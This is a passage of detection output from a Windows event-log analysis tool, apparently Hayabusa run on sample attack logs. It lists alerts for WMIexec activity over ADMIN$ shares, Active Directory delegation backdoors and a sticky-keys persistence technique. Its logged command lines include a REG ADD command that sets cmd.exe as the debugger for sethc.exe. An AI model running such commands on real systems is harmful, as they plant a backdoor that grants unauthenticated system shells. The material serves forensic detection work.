0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,../hayabusa-rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 